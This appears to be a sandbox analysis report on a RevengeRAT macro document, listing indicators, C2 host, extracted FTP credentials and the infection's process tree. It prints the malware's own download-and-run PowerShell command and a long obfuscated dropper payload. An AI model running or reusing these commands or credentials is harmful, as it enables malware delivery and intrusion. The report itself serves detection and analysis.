revengerat | 27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696

Resubmissions

24-09-2024 02:47

240924-dab1nasfnm 10

24-09-2024 01:10

240924-bjndya1hrj 10

Analysis

max time kernel
83s
max time network
86s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 02:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm
Size

124KB
MD5

cc0f9cc1f9133b0f5dd045a34b2d7ae1
SHA1

c41f1c79442c0e2b717473f9c40d395176afffdb
SHA256

27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696
SHA512

154c2ddc43ba72e1f166dc025e20ef5c580e1f490f1828496c1f10f8ef17b4432137740c66552d12cb647499e9ad7d5a62e5ab709ed2bcd9d08d2416b475c3da
SSDEEP

1536:vkc9anle9tQVTGH7gPgP8MDw/jlQx1JE7vReOr0l77CXXNaHsdUXSIt98iuBXFtc:vVWqQVtClwH9r0l77AnsSmy/BVtqxp

Score

10^/10

revengerat nyancatrevenge defense_evasion discovery execution persistence trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Extracted

Family

revengerat

Botnet

NyanCatRevenge

marcelotatuape.ddns.net:333

Mutex

b25e533944db469

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	2856	1448	powershell.exe	88

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

Blocklisted process makes network request 9 IoCs

flow	pid	Process
29	2856	powershell.exe
31	2856	powershell.exe
38	1968	powershell.exe
42	1968	powershell.exe
47	1968	powershell.exe
51	1968	powershell.exe
54	1968	powershell.exe
55	1968	powershell.exe
58	1688	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2320	powershell.exe
1688	powershell.exe
3656	powershell.exe
1968	powershell.exe
2368	powershell.exe
1100	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_qnt = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\npdii.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
57	pastebin.com
58	pastebin.com

Drops file in System32 directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1688 set thread context of 4564	1688	powershell.exe	117

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Crashpad\metadata	setup.exe
File opened for modification	C:\Program Files\Crashpad\settings.dat	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716197212093685"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	explorer.exe

Runs .reg file with regedit 1 IoCs

pid	Process
3916	regedit.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
1448	WINWORD.EXE
1448	WINWORD.EXE
5052	vlc.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
2856	powershell.exe
2856	powershell.exe
2856	powershell.exe
3656	powershell.exe
3656	powershell.exe
3656	powershell.exe
1968	powershell.exe
1968	powershell.exe
1968	powershell.exe
1968	powershell.exe
2368	powershell.exe
2368	powershell.exe
1100	powershell.exe
1100	powershell.exe
2368	powershell.exe
1100	powershell.exe
2320	powershell.exe
2320	powershell.exe
2320	powershell.exe
2732	mspaint.exe
2732	mspaint.exe
1688	powershell.exe
1688	powershell.exe
1688	powershell.exe
1688	powershell.exe
2412	chrome.exe
2412	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5052	vlc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe
Token: SeCreatePagefilePrivilege	2412	chrome.exe
Token: SeShutdownPrivilege	2412	chrome.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
5052	vlc.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe
2412	chrome.exe

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
1448	WINWORD.EXE
2732	mspaint.exe
4948	OpenWith.exe
5052	vlc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1448 wrote to memory of 2856	1448	WINWORD.EXE	96
PID 1448 wrote to memory of 2856	1448	WINWORD.EXE	96
PID 2856 wrote to memory of 4880	2856	powershell.exe	101
PID 2856 wrote to memory of 4880	2856	powershell.exe	101
PID 2992 wrote to memory of 4928	2992	explorer.exe	103
PID 2992 wrote to memory of 4928	2992	explorer.exe	103
PID 4928 wrote to memory of 3656	4928	WScript.exe	104
PID 4928 wrote to memory of 3656	4928	WScript.exe	104
PID 3656 wrote to memory of 1968	3656	powershell.exe	106
PID 3656 wrote to memory of 1968	3656	powershell.exe	106
PID 1968 wrote to memory of 2368	1968	powershell.exe	109
PID 1968 wrote to memory of 2368	1968	powershell.exe	109
PID 1968 wrote to memory of 1100	1968	powershell.exe	110
PID 1968 wrote to memory of 1100	1968	powershell.exe	110
PID 1968 wrote to memory of 2320	1968	powershell.exe	111
PID 1968 wrote to memory of 2320	1968	powershell.exe	111
PID 1968 wrote to memory of 1688	1968	powershell.exe	113
PID 1968 wrote to memory of 1688	1968	powershell.exe	113
PID 1968 wrote to memory of 4712	1968	powershell.exe	114
PID 1968 wrote to memory of 4712	1968	powershell.exe	114
PID 1688 wrote to memory of 4564	1688	powershell.exe	117
PID 1688 wrote to memory of 4564	1688	powershell.exe	117
PID 1688 wrote to memory of 4564	1688	powershell.exe	117
PID 1688 wrote to memory of 4564	1688	powershell.exe	117
PID 1688 wrote to memory of 4564	1688	powershell.exe	117
PID 1688 wrote to memory of 4564	1688	powershell.exe	117
PID 1688 wrote to memory of 4564	1688	powershell.exe	117
PID 1688 wrote to memory of 4564	1688	powershell.exe	117
PID 2412 wrote to memory of 1312	2412	chrome.exe	124
PID 2412 wrote to memory of 1312	2412	chrome.exe	124
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 3836	2412	chrome.exe	125
PID 2412 wrote to memory of 2848	2412	chrome.exe	126
PID 2412 wrote to memory of 2848	2412	chrome.exe	126
PID 2412 wrote to memory of 4420	2412	chrome.exe	127
PID 2412 wrote to memory of 4420	2412	chrome.exe	127

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/CE3CTlT9/DlRvs8N_.dc5ccedf8d8817fc5fe4f69239307383 -o test.js; explorer.exe test.js
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2856
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe" test.js
    3⤵
    PID:4880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4264,i,5469445176230119590,7931734017267321834,262144 --variations-seed-version --mojo-platform-channel-handle=4608 /prefetch:8
1⤵
PID:1816

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2992
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA㍿pAFUAbg㍿KAGEAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsASQ㍿mACAAKAAgACQAaQ㍿VAG4ASg㍿hACAAKQAgAHsAJA㍿NAGkAUg㍿JAGQAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AGQAZQ㍿sACAAKAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAJw㍿oAHQAdA㍿wAHMAOgAvAC8AZA㍿yAGkAdg㍿lAC4AZw㍿vAG8AZw㍿sAGUALg㍿jAG8AbQAvAHUAYwA/AGUAeA㍿wAG8Acg㍿0AD0AZA㍿vAHcAbg㍿sAG8AYQ㍿kACYAaQ㍿kAD0AJwA7ACQAcw㍿CAGkAaQ㍿XACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsAaQ㍿mACAAKAAgACQAcw㍿CAGkAaQ㍿XACAAKQAgAHsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAKAAkAFIAWQ㍿FAGEARgAgACsAIAAnADEATg㍿hAHEAZA㍿OAFgAaQ㍿HAHYASQ㍿fAHEAMQ㍿SAFAAaw㍿hAHoARg㍿0AE0AeQ㍿nAG0AYQ㍿xAFQASg㍿YAHUANAAyACcAKQAgADsAfQ㍿lAGwAcw㍿lACAAewAkAFIAWQ㍿FAGEARgAgAD0AIAAoACQAUg㍿ZAEUAYQ㍿GACAAKwAgACcAMQ㍿nADEAag㍿tAFgAdQ㍿zAFgAOQ㍿tAGMAOQ㍿WAG0AaA㍿WAHIASg㍿KADIAWA㍿vAGYAWgAzAGEASw㍿fAGMATA㍿PAHQAJwApACAAOw㍿9ADsAJA㍿JAGEAbw㍿NAGkAIAA9ACAAKAAgAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACAAKQAgADsAJA㍿JAGEAbw㍿NAGkALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAAgADsAJA㍿JAGEAbw㍿NAGkALg㍿EAG8Adw㍿uAGwAbw㍿hAGQARg㍿pAGwAZQAoACQAVQ㍿SAEwASw㍿CACwAIAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApACAAOwAkAEEAVQ㍿yAEcARgAgAD0AIAAoACAAJw㍿DADoAXA㍿VAHMAZQ㍿yAHMAXAAnACAAKwAgAFsARQ㍿uAHYAaQ㍿yAG8Abg㍿tAGUAbg㍿0AF0AOgA6AFUAcw㍿lAHIATg㍿hAG0AZQAgACkAOw㍿JAHoAag㍿㍿AFEAIAA9ACAAKAAgACQATQ㍿pAFIASQ㍿kACAAKwAgACcAXA㍿VAHAAdw㍿pAG4ALg㍿tAHMAdQAnACAAKQAgADsAIA㍿wAG8Adw㍿lAHIAcw㍿oAGUAbA㍿sAC4AZQ㍿4AGUAIA㍿3AHUAcw㍿hAC4AZQ㍿4AGUAIA㍿JAHoAag㍿㍿AFEAIAAvAHEAdQ㍿pAGUAdAAgAC8Abg㍿vAHIAZQ㍿zAHQAYQ㍿yAHQAIAA7ACAAQw㍿vAHAAeQAtAEkAdA㍿lAG0AIAAnACUARA㍿DAFAASg㍿VACUAJwAgAC0ARA㍿lAHMAdA㍿pAG4AYQ㍿0AGkAbw㍿uACAAKAAgACQAQQ㍿VAHIARw㍿GACAAKwAgACcAXA㍿㍿AHAAcA㍿EAGEAdA㍿hAFwAUg㍿vAGEAbQ㍿pAG4AZw㍿cAE0AaQ㍿jAHIAbw㍿zAG8AZg㍿0AFwAVw㍿pAG4AZA㍿vAHcAcw㍿cAFMAdA㍿hAHIAdAAgAE0AZQ㍿uAHUAXA㍿QAHIAbw㍿nAHIAYQ㍿tAHMAXA㍿TAHQAYQ㍿yAHQAdQ㍿wACcAIAApACAALQ㍿mAG8Acg㍿jAGUAIAA7AHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAC0AYw㍿vAG0AbQ㍿hAG4AZAAgACcAcw㍿sAGUAZQ㍿wACAAMQA4ADAAJwA7ACAAcw㍿oAHUAdA㍿kAG8Adw㍿uAC4AZQ㍿4AGUAIAAvAHIAIAAvAHQAIAAwACAALw㍿mACAAfQ㍿lAGwAcw㍿lACAAew㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAcg㍿2AGkAYw㍿lAFAAbw㍿pAG4AdA㍿NAGEAbg㍿hAGcAZQ㍿yAF0AOgA6AFMAZQ㍿yAHYAZQ㍿yAEMAZQ㍿yAHQAaQ㍿mAGkAYw㍿hAHQAZQ㍿WAGEAbA㍿pAGQAYQ㍿0AGkAbw㍿uAEMAYQ㍿sAGwAYg㍿hAGMAawAgAD0AIA㍿7ACQAdA㍿yAHUAZQ㍿9ADsAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAHIAdg㍿pAGMAZQ㍿QAG8AaQ㍿uAHQATQ㍿hAG4AYQ㍿nAGUAcg㍿dADoAOg㍿TAGUAYw㍿1AHIAaQ㍿0AHkAUA㍿yAG8AdA㍿vAGMAbw㍿sACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿jAHUAcg㍿pAHQAeQ㍿QAHIAbw㍿0AG8AYw㍿vAGwAVA㍿5AHAAZQ㍿dADoAOg㍿UAGwAcwAxADIAOwAkAFIAeg㍿XAFcAcgAgAD0AIAAoAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACkAOwAkAFIAeg㍿XAFcAcgAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ADsAJA㍿SAHoAVw㍿XAHIALg㍿DAHIAZQ㍿kAGUAbg㍿0AGkAYQ㍿sAHMAIAA9ACAAbg㍿lAHcALQ㍿vAGIAag㍿lAGMAdAAgAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿OAGUAdA㍿3AG8Acg㍿rAEMAcg㍿lAGQAZQ㍿uAHQAaQ㍿hAGwAKAAnAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQAMQAnACwAJw㍿kAGUAdg㍿lAGwAbw㍿wAGUAcg㍿wAHIAbwAyADEANQA3ADgASg㍿wAEAAQAAnACkAOwAkAFYAdA㍿hAEEARgAgAD0AIAAkAFIAeg㍿XAFcAcgAuAEQAbw㍿3AG4AbA㍿vAGEAZA㍿TAHQAcg㍿pAG4AZwAoACAAJw㍿mAHQAcAA6AC8ALw㍿kAGUAcw㍿jAGsAdg㍿iAHIAYQ㍿0ADEAQA㍿mAHQAcAAuAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQALg㍿jAG8AbQAuAGIAcgAvAFUAcA㍿jAHIAeQ㍿wAHQAZQ㍿yAC8AMAAyAC8ARA㍿MAEwAMAAxAC4AdA㍿4AHQAJwAgACkAOwAkAFIAeg㍿XAFcAcgAuAGQAaQ㍿zAHAAbw㍿zAGUAKAApADsAJA㍿SAHoAVw㍿XAHIAIAA9ACAAKA㍿OAGUAdwAtAE8AYg㍿qAGUAYw㍿0ACAATg㍿lAHQALg㍿XAGUAYg㍿DAGwAaQ㍿lAG4AdAApADsAJA㍿SAHoAVw㍿XAHIALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAA7ACQAVg㍿0AGEAQQ㍿GACAAPQAgACQAUg㍿6AFcAVw㍿yAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAgACkAOw㍿bAEIAeQ㍿0AGUAWw㍿dAF0AIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQw㍿vAG4Adg㍿lAHIAdA㍿dADoAOg㍿GAHIAbw㍿tAEIAYQ㍿zAGUANgA0AFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAuAFIAZQ㍿wAGwAYQ㍿jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApADsAWw㍿TAHkAcw㍿0AGUAbQAuAEEAcA㍿wAEQAbw㍿tAGEAaQ㍿uAF0AOgA6AEMAdQ㍿yAHIAZQ㍿uAHQARA㍿vAG0AYQ㍿pAG4ALg㍿MAG8AYQ㍿kACgAIAAkAFIAWA㍿pAFYAag㍿fAFkAbA